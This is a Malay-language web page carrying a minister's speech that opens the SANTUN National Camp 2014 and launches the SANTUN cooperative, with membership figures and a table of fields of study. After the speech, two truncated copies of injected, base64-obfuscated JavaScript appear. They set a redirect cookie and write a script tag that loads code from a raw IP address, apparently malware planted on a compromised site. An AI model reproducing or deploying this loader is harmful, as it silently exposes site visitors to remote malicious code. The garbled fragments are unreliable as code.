YaPEIM » Majlis Perasmian Perkhemahan Nasional SANTUN 2014 & Pelancaran Koperasi SANTUN

Terkini

Majlis Perasmian Perkhemahan Nasional SANTUN 2014 & Pelancaran Koperasi SANTUN

Majlis dirasmikan oleh Y.B Mejar Jeneral Dato Seri Jamil Khir bin Hj Baharom di Berjaya Times Square Hotel.

BISMILLAHHIRAHMANIRRAHIM

– Y.BHG. DATO’ (DR) HJ ABD MALEK BIN HJ AWANG KECHIL (PRESIDEN YaPEIM dan Pengerusi LPA YaPEIM)

– YBHG DATUK HJH ZALEHA HUSIN (TIMB. PRESIDEN  YaPEIM)

– Y.BHG. DATO’ ABIBULLAH HJ. SAMSUDIN (KETUA PENGARAH YaPEIM)

– AHLI-AHLI LEMBAGA PEMEGANG AMANAH YaPEIM DAN PEMANGKIN

– PEMIMPIN DAN WARGA SANTUN YANG DIRAIKAN

– AHLI-AHLI MEDIA MASSA

– SDRA/I SEKALIAN 

ASSALAMUALAIKUM WR WBH.

PENGHARGAAN

1. Alhamdulillah, kesyukuran yang setinggi-tingginya saya ucapkan ke hadrat Allah SWT di atas limpah izin dan kurnia-Nya, saya dapat bersama-sama keluarga besar YaPEIM, dan kali ini adalah bagi menyempurnakan Majlis Perasmian Perkhemahan SANTUN Nasional 2014 dan Pelancaran Koperasi SANTUN Berhad,  pada hari yang berbahagia dan bersejarah ini.

2. Saya ingin mengambil peluang ini untuk mengucapkan berbanyak terima kasih yang tidak terhingga kepada Presiden dan Pengurusan YaPEIM, PEMANGKIN dan Kelab SANTUN, di atas kesudian menjemput saya bagi menyempurnakan Majlis Perasmian dan Pelancaran pada hari ini. Secara peribadi saya anggap kesempatan seperti ini amat bermakna dan besar ertinya kepada saya selaku Menteri yang bertanggungjawab terhadap perjalanan YaPEIM.

3. Saya juga ingin merakamkan tahniah dan setinggi penghargaan kepada kepimpinan YaPEIM dan PEMANGKIN amnya dan kepimpinan SANTUN khasnya kerana telah mempamerkan kemajuan yang sangat memberangsangkan sejak  PEMANGKIN dilancarkan pada 26 April 2009 yang lalu.

PERKEMBANGAN YANG MEMBERANGSANGKAN

4. Berdasarkan pemerhatian saya bahawa SANTUN telah berkembang pesat sekali, adalah berasaskan  beberapa fakta berikut:

Pertama: Pertambahan jumlah besar warga SANTUN

Jumlah warga SANTUN semasa PEMANGKIN dilancarkan  pada awal tahun 2009 yang lalu adalah seramai 491 orang. Saya percaya kini kesemua warga SANTUN yang berdaftar pada masa tersebut, masing-masing telah menamatkan pengajian sekurang-kurang diperingkat ijazah pertama dan ada yang telah memulakan kariernya di bidang pilihan masing-masing. Difahamkan pada hari ini pun sebahagian daripada mereka dapat bersama, dan kini menjayakan inisiatif penubuhan Alumni SANTUN. Tahniah.

Tahniah saya ucapkan kepada mereka yang merintis kejayaan ini dan diharap warga perintis ini akan terus menjadi model yang boleh dijadikan rujukan kepada warga yang bakal menjejaki mereka. Penubuhan Alumni SANTUN saya anggap sebagai langkah kehadapan untuk memanjangkan khidmat kepada generasi SANTUN masa kini dan kehadapan.

Saya sangat gembira apabila dimaklumkan bahawa kini warga SANTUN telah mencecah 3,600 orang dan pada penghujung tahun ini akan berjumlah 4,000 orang warganya. Pertambahan warga ini sekaligus memberi refleksi bertambahnya warga yang cemerlang dan bakal memberi sumbangan besar dan bermakna kepada umat dan Negara pada masa depan; 

Kedua:   Kegiatan SANTUN lebih terbuka

Fokus kegiatan SANTUN pada peringkat awal, khususnya pada tahun 2009 adalah tertumpu kepada penyediaan bantuan kewangan dan kegiatan lain yang sangat terbatas (Program Motivasi, Program Sukarelawan dan Program Perantis melibatkan kerjasama dengan sektor korporat); bagaimanapun sejak tempoh itu SANTUN telah maju dari satu tahap ke satu tahap.

Kini SANTUN berupaya memantapkan elemen kepimpinan dengan memberi ruang yang luas kepada warganya untuk melaksanakan pelbagai program dan aktiviti yang memberi manfaat kepada ahli dan masyarakat. Program dan aktiviti SANTUN dimantapkan lagi dengan pengwujudan  Kelab-kelab SANTUN bukan sahaja di peringkat Nasional dan Zon-zon (dalam  Negara), malah Kelab SANTUN di luar Negara juga telah berjaya ditubuhkan.

Kelab SANTUN di luar Negara yang Berjaya diwujudkan dan mendapat  sokongan Jabatan Penuntut Malaysia Luar di luar Negara (EM) adalah seperti Kelab SANTUN Eropah, Kelab SANTUN Amerika Utara, Kelab SANTUN Timor Tengah dan Kelab SANTUN Oceania;

Hari ini pun menjadi bukti bahawa warga SANTUN berupaya menjayakan program besar (Perkhemahan Nasional SANTUN 2014), yang pastinya akan memberi impak yang tersendiri kepada usaha memantapkan ciri-ciri kepimpinan warga SANTUN.

Saya ingin mengambil peluang ini untuk mengucapkan tahniah di atas suatu inisiataif yang sangat penting ini. Kejayaan warga SANTUN diperingkat ini pastilah akan berupaya menjadi rujukan kepada generasi baru sebagai persiapan penting kepada wujudnya generasi pelapis yang bersedia untuk mendokong tanggungjawab besar pada masa depan.

Ketiga:  Pertambahan warga SANTUN di bidang strategik

Lebih memberangsangkan lagi, apabila saya perhatikan berasaskan maklumat yang saya perolehi, warga SANTUN yang terpilih (berasaskan pemilihan oleh Kementerian Pendidikan dan Jabatan Pendidikan Daerah di seluruh Negara), kelulusan Akademik di peringkat SPM adalah sangat cemerlang dan masing-masing memilih bidang-bidang kegemaran masing-masing.

Fakta berikut memperincikan bidang-bidang pilihan warga cemerlang ini: 

BIL

JURUSAN

BILANGAN WARGA

PERATUS (%)

1

PERAKAUNAN / EKONOMI

482

13.4

2

SAINS

454

12.5

3

KEJURUTERAAN

448

12.3

4

PENGURUSAN / PERNIAGAAN

368

10.2

5

PENDIDIKAN

281

8.0

6

SAINS TEKNOLOGI

269

7.3

7

SAINS SOSIAL

198

5.4

8

PERUBATAN (SOKONGAN)

192

5.3

9

PERUBATAN

186

5.2

10

TEKNOLOGI MAKLUMAT

129

3.5

11

SAINS KESIHATAN

108

3.0

12

PENGAJIAN AGAMA

102

2.8

13

PERTANIAN

88

2.4

14

ARKITEK

64

1.7

15

SASTERA

52

1.4

16

VETERINAR

49

1.3

17

PERUNDANGAN

46

1.2

18

LAIN-LAIN

42

1.2

19

KESENIAN / KEBUDAYAAN

37

1.0

20

MARITIM

35

0.9

JUMLAH

3622

100

Peningkatan SANTUN Nasional selepas pelancaran:

2006 – 2009 = 491

2010 = 747

2011 = 1549

2012 = 2395

2013 = 3456

2014 = 3622 

Master: 6 orang

PhD: 2 orang dalam bidang Mathematik & Syariah

– Mohamad Nazri Hussein: PhD Mathematik, UMT

– Khairul Azhar Meerangani: PhD Syariah, UM

Fakta ini memberi gambaran bahawa Negara kita akan terus diperkuatkan dengan kehadiran warga yang professional dalam pelbagai bidang ini pada masa depan.

MERCU TANDA BARU SANTUN

5. Sewaktu PEMANGKIN dilancarkan  pada tahun 2009, saya juga berpeluang mengikuti pelancaran Buku bertajuk “Jalan Berliku Menuju Puncak” yang merupakan himpunan kisah anak-anak SANTUN YaPEIM yang telah disiarkan menerusi Berita Harian (Ruangan SKOR) pada setiap hari Rabu pada satu tempoh dahulu. (Sesungguhnya himpunan kisah hidup anak-anak SANTUN ini berupaya menjadi iktibar kepada pelajar-pelajar kita yang berusaha mengejar kecemerlangan walaupun dalam keadaan yang serba kekurangan iaitu sama ada kehilangan ibu bapa atau miskin);

6. Alhamdulillah, hari ini kita menyaksikan pula satu lagi kemajuan penting sebagai  mercu tanda baru yang dicapai dalam perjalanan SANTUN, apabila sebuah koperasi yang diberi nama Koperasi SANTUN Berhad berjaya diinstitusi dan InsyaAllah secara rasmi akan dilancarkan pada hari yang bersejarah ini.

7. Saya sangat yakin bahawa kewujudan koperasi khas seperti ini,  merupakan suatu peluang keemasan yang disediakan oleh YaPEIM dan PEMANGKIN kepada warga SANTUN, dan adalah wajar warga SANTUN memanfaatkan peluang ini dengan optimum dan semaksimum, kerana melalui penyertaan dalam  koperasi ini, InsyaAllah akan memberi manfaat yang besar kepada warganya, berasaskan beberapa fakta berikut:

Pertama: Koperasi berpotensi mempunyai dana awal yang substantial

Koperasi ini mempunyai dana asas yang diperuntukkan oleh YaPEIM melalui PEMANGKIN kepada setiap warga SANTUN yang menyertai koperasi ini atas nama Sumbangan  Saham Ahli (iaitu sejumlah RM500.00 seorang setahun selama minimum 6 tahun). Ertinya setiap warga SANTUN layak menerima peruntukkan saham ahli secara percuma pada jumlah   RM3,000.00 seorang, dan dengan jumlah warga SANTUN seramai 4,000 orang pada penghujung tahun ini, maka bagi tempoh 6 tahun,  dana daripada saham ahli yang akan diuruskan oleh koperasi adalah sejumlah RM12 juta. Dana awal ini berpotensi bertambah pada jumlah gandaan yang lebih besar, apabila setiap ahli bersedia memanfaatkan koperasi sebagai tempat membuat simpanan dan pengeluaran bagi keperluan harian.

Kedua: Koperasi berpeluang memanfaatkan kemudahan yang disediakan oleh kerajaan termasuk yang disediakan di bawah Suruhanjaya Koperasi Malaysia.

Melalui kewujudan koperasi seperti ini, warga koperasi berpeluang meningkatkan keupayaan kewangan termasuk pelaburan dengan memanfaatkan kemudahan yang disediakan oleh kerajaan termasuk memanfaatkan dana pinjaman mudah yang disediakan  oleh kerajaan di bawah Suruhanjaya Koperasi Malaysia (SKM).  

Ketiga: Pelbagai kemudahan dan manfaat boleh diwujudkan di bawah koperasi

Berasaskan dana asas dan kemudahan pinjaman mudah yang disediakan oleh kerajaan, koperasi berpeluang untuk menjana pulangan yang bersesuaian, yang akhirnya membolehkan beberapa kemudahan baru dapat diwujudkan, termasuk Skim Pembiayaan Keusahawanan SANTUN, Skim Kebajikan warga SANTUN, malah pengagihan keuntungan juga boleh dilaksanakan pada masa yang bersesuaian.

8. Sesunguhnya perkembangan yang memberangsangkan ini secara jelas memberi satu petanda bahawa sesuatu yang positif telah dan sedang kita lakukan, dan kita doakan agar ianya termasuk dalam maksud Islah seperti yang diisyaratkan melalui  Surah Al-Baqarah ayat 220 Allah (bermaksud):

 “Mengenai urusan-urusan kamu di dunia dan di akhirat dan mereka bertanya lagi kepadamu (wahai Muhammad) mengenai masalah anak-anak yatim, katakanlah: “Memperbaiki keadaan anak-anak yatim itu amatlah baiknya.”

9. Secara umum saya ingin menyimpulkan bahawa keupayaan menjayakan program-program termasuk SANTUN dan mencapai tahap yang membanggakan ini, adalah berkat komitmen dan usaha gigih semua pihak. Bagaimanapun untuk ianya  terus berjaya dan cemerlang dalam apa jua yang dilakukan pada masa depan, ianya sangat bergantung kepada beberapa faktor berikut:

Pertama:  Komitmen dan Penyertaan warga 

Semua warga institusi ini termasuk Warga SANTUN sewajar mengambil peranan yang lebih utama dan pro aktif dalam  memastikan program yang dikemukakan dapat dijayakan sepenuhnya, malah dapat dipertahan dan diteruskan pada masa depan;

Kedua: Mempertahan keikhlasan dan meningkatkan profesionalisme serta memantapkan semangat berpasukan

Diantara faktor penentu yang utama dalam mempertahan dan meneruskan kejayaan program yang dikemukakan pada masa depan adalah dengan memastikan niat setiap warga haruslah sentiasa tulus dan murni dalam menjayakan sesuatu misi dan visi yang ditentukan. Tahap penguasaan ilmu dan kemahiran seharusnya berada ditahap tertinggi. Dan juga menjadi elemen yang sangat mendasar ialah semangat Amal Jama’iy hendaklah menjadi pegangan dan pendekatan dalam menjayakan setiap urusan dan mencapai sesuatu matlamat yang telah disepakati.;

Ketiga:    Memantap dan menjaga institusi

Institusi induk kepada SANTUN khususnya YaPEIM dan PEMANGKIN, hendaklah terus dimantapkan malah hendaklah sentiasa dijaga dan dilindungi daripada sebarang anasir dan tindakan yang destruktif. Sesungguhnya seperti yang kita tahu bahawa untuk mempertahankan apa yang telah dicapai lebih sukar berbanding langkah dan effort untuk mencipta kejayaan berkenaan; dan

Keempat:  Sentiasa menjaga dan mempertahankan Negara

Sesungguhnya kita harus menginsafi bahawa sesuatu yang kita lakukan dan jayakan selama ini, adalah kerana ada bumi yang kita pijak dan ada langit yang kita junjung. Ertinya kita bukan berada di dalam vakum (ruang kosong).  Atas dasar itulah di dalam apa jua keadaan negara dan umat hendaklah sentiasa dijaga dan dipertahankan, kerana disinilah bumi dipijak dan langit dijunjung. Suasana negara yang aman dan sejahtera lah yang  memungkinkan kejayaan demi kejayaan dapat kita cipta dan nikmati bersama.

Dalam apa jua keadaan sekalipun, warga kita seharusnya sama sekali jangan mengizinkan diri kita dieksploitasi oleh mana-mana pihak yang tidak senang dengan kehebatan pencapaian dan suasana Negara yang aman dan bersatu.

10. Sesungguhnya menyedari kepentingan faktor-faktor seperti saya nyatakan ini merupakan penting, dalam menjayakan rancangan dan program yang kita perkenalkan, termasuklah bagi memantap dan menjayakan misi Kelab SANTUN di dalam dan luar Negara, serta menggerakkan Koperasi SANTUN Berhad dan menjadikan ianya sebagai antara koperasi yang paling berjaya di Negara ini pada masa depan.

11. Saya sangat yakin warga YaPEIM, PEMANGKIN dan SANTUN, mampu membawa semangat yang murni ini dan menjayakan setiap program yang diperkenalkan, InsyaAllah.

12. Mengakhiri ucapan saya ini, izinkan saya mengucapkan tahniah dan terima kasih atas kejayaan penganjuran majlis yang penting pada hari ini. Dan izinkan saya mengambil peluang ini sekali lagi untuk mengucapkan:

– Selamat berkampung dalam Perkhemahan Nasional SANTUN 2014;

– Selamat Menggerakkan Kelab-kelab SANTUN di dalam dan Luar Negara;

– Selamat Menjayakan Kelab Alumni SANTUN; dan

– Selamat merealisasikan misi menjadi Koperasi SANTUN  Berhad sebagai koperasi contoh dan rujukan;

13. Dengan kata-kata itu, dan dengan lafaz Bismillahirrahmanirrahim, saya Merasmikan Perkhemahan SANTUN Nasional 2014 dan Melancarkan Penubuhan Koperasi SANTUN Berhad. Dengan harapan dan doa semoga Allah SWT meRahmati dan memberi Restunya terhadap usaha murni kita bersama, InsyaAllah. Wassalamu’alaikum Wr Wbth.

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top